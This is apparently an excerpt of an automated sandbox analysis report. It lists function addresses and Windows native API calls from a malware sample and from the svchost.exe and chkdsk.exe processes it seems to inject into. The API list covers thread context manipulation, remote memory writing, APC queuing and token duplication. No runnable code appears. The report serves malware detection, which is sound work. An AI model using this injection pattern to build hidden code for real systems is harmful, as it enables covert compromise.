Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030739B0 NtGetContextThread,	2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D10 NtOpenProcessToken,	2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D70 NtOpenThread,	2_2_03073D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B4650 NtSuspendThread,LdrInitializeThunk,	5_2_058B4650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B4340 NtSetContextThread,LdrInitializeThunk,	5_2_058B4340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_058B2DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_058B2DF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_058B2D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_058B2D30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_058B2CA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2C60 NtCreateKey,LdrInitializeThunk,	5_2_058B2C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_058B2C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2FB0 NtResumeThread,LdrInitializeThunk,	5_2_058B2FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2FE0 NtCreateFile,LdrInitializeThunk,	5_2_058B2FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2F30 NtCreateSection,LdrInitializeThunk,	5_2_058B2F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_058B2E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_058B2EE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_058B2BA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_058B2BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_058B2BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2B60 NtClose,LdrInitializeThunk,	5_2_058B2B60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2AD0 NtReadFile,LdrInitializeThunk,	5_2_058B2AD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2AF0 NtWriteFile,LdrInitializeThunk,	5_2_058B2AF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B35C0 NtCreateMutant,LdrInitializeThunk,	5_2_058B35C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B39B0 NtGetContextThread,LdrInitializeThunk,	5_2_058B39B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2DB0 NtEnumerateKey,	5_2_058B2DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2D00 NtSetInformationFile,	5_2_058B2D00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2CC0 NtQueryVirtualMemory,	5_2_058B2CC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2CF0 NtOpenProcess,	5_2_058B2CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2C00 NtQueryInformationProcess,	5_2_058B2C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2F90 NtProtectVirtualMemory,	5_2_058B2F90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2FA0 NtQuerySection,	5_2_058B2FA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2F60 NtCreateProcessEx,	5_2_058B2F60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2EA0 NtAdjustPrivilegesToken,	5_2_058B2EA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2E30 NtWriteVirtualMemory,	5_2_058B2E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2B80 NtQueryInformationFile,	5_2_058B2B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B2AB0 NtWaitForSingleObject,	5_2_058B2AB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B3090 NtSetValueKey,	5_2_058B3090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B3010 NtOpenDirectoryObject,	5_2_058B3010
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B3D10 NtOpenProcessToken,	5_2_058B3D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058B3D70 NtOpenThread,	5_2_058B3D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050A95C0 NtAllocateVirtualMemory,	5_2_050A95C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050A9460 NtClose,	5_2_050A9460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050A9160 NtCreateFile,	5_2_050A9160
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050A93C0 NtDeleteFile,	5_2_050A93C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_050A92D0 NtReadFile,	5_2_050A92D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0573FB91 NtSetContextThread,	5_2_0573FB91

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A56685: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00A56685

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A4ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00A4ACC5

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A579D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00A579D3

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A3B043	0_2_00A3B043
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A4410F	0_2_00A4410F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A302A4	0_2_00A302A4
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A1E3B0	0_2_00A1E3B0
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A4038E	0_2_00A4038E
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A306D9	0_2_00A306D9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A4467F	0_2_00A4467F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A7AACE	0_2_00A7AACE
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A44BEF	0_2_00A44BEF
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A3CCC1	0_2_00A3CCC1
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A16F07	0_2_00A16F07
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A1AF50	0_2_00A1AF50
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A3D1B9	0_2_00A3D1B9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A731BC	0_2_00A731BC
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A2B11F	0_2_00A2B11F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A3123A	0_2_00A3123A
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A23200	0_2_00A23200
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A4724D	0_2_00A4724D
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A193F0	0_2_00A193F0
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A513CA	0_2_00A513CA
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A2F563	0_2_00A2F563
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A196C0	0_2_00A196C0
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5B6CC	0_2_00A5B6CC
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A177B0	0_2_00A177B0
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A7F7FF	0_2_00A7F7FF
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A479C9	0_2_00A479C9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A2FA57	0_2_00A2FA57
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A19B60	0_2_00A19B60
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A23B70	0_2_00A23B70
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A17D19	0_2_00A17D19
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A39ED0	0_2_00A39ED0
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A2FE6F	0_2_00A2FE6F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A17FA3	0_2_00A17FA3
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00C773F0	0_2_00C773F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E8653	2_2_004E8653
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E6863	2_2_004E6863
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D30D0	2_2_004D30D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004DE093	2_2_004DE093
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004E00B3	2_2_004E00B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004DE1D7	2_2_004DE1D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004DE1E3	2_2_004DE1E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D1A80	2_2_004D1A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D1C30	2_2_004D1C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D2500	2_2_004D2500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004FEE33	2_2_004FEE33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004DFE93	2_2_004DFE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004D27E0	2_2_004D27E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031003E6	2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C02C0	2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030100	2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F41A2	2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031001AA	2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F81CC	2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064750	2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C6E0	2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03100591	2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4420	2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F2446	2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EE4F6	2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F6BD7	2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310A9A6	2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304A840	2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030268B8	2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E8F0	2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03082F28	2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060F30	2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E2F30	2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40	2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BEFA0	2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032FC8	2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304CFE0	2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEE26	2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040E59	2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052E90	2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FCE93	2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEEDB	2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304AD00	2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DCD1F	2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03058DBF	2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303ADE0	2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040C00	2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0CB5	2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030CF2	2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F132D	2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302D34C	2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0308739A	2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030452A0	2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B2C0	2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E12ED	2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307516C	2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302F172	2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310B16B	2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304B1B0	2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EF0CC	2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030470C0	2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F70E9	2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF0E0	2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF7B0	2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085630	2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F16CC	2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7571	2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DD5B0	2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF43F	2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03031460	2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFB76	2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FB80	2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B5BF0	2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307DBF9	2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFA49	2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7A46	2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B3A6C	2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DDAAC	2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085AA0	2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E1AA3	2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EDAC6	2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D5910	2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049950	2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B950	2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AD800	2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030438E0	2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFF09	2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03041F92	2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFFB1	2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03003FD2	2_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03003FD5	2_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049EB0	2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03043D40	2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F1D5A	2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7D73	2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FDC0	2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B9C32	2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFCF2	2_2_030FFCF2
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CDAC80	4_2_06CDAC80
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CDAC74	4_2_06CDAC74
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE1A30	4_2_06CE1A30
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CDCB50	4_2_06CDCB50
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE3300	4_2_06CE3300
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CDAB30	4_2_06CDAB30
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CFB8D0	4_2_06CFB8D0
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CE50F0	4_2_06CE50F0
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4_2_06CDC930	4_2_06CDC930
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05940591	5_2_05940591
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05880535	5_2_05880535
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0592E4F6	5_2_0592E4F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05924420	5_2_05924420
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05932446	5_2_05932446
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0587C7C0	5_2_0587C7C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058A4750	5_2_058A4750
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05880770	5_2_05880770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0589C6E0	5_2_0589C6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059341A2	5_2_059341A2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059401AA	5_2_059401AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059381CC	5_2_059381CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05870100	5_2_05870100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0591A118	5_2_0591A118
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05908158	5_2_05908158
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05912000	5_2_05912000
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059403E6	5_2_059403E6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0588E3F0	5_2_0588E3F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593A352	5_2_0593A352
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059002C0	5_2_059002C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0589A20D	5_2_0589A20D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05920274	5_2_05920274
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05898DBF	5_2_05898DBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0587ADE0	5_2_0587ADE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0588AD00	5_2_0588AD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0591CD1F	5_2_0591CD1F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05920CB5	5_2_05920CB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05870CF2	5_2_05870CF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05880C00	5_2_05880C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058FEFA0	5_2_058FEFA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05872FC8	5_2_05872FC8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0588CFE0	5_2_0588CFE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05922F30	5_2_05922F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058C2F28	5_2_058C2F28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058A0F30	5_2_058A0F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058F4F40	5_2_058F4F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593CE93	5_2_0593CE93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05892E90	5_2_05892E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593EEDB	5_2_0593EEDB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593EE26	5_2_0593EE26
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05880E59	5_2_05880E59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058829A0	5_2_058829A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0594A9A6	5_2_0594A9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05896962	5_2_05896962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058668B8	5_2_058668B8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058AE8F0	5_2_058AE8F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0588A840	5_2_0588A840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05882840	5_2_05882840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05936BD7	5_2_05936BD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593AB40	5_2_0593AB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0587EA80	5_2_0587EA80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0591D5B0	5_2_0591D5B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059495C3	5_2_059495C3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05937571	5_2_05937571
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593F43F	5_2_0593F43F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_05871460	5_2_05871460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0593F7B0	5_2_0593F7B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_059316CC	5_2_059316CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_058C5630	5_2_058C5630
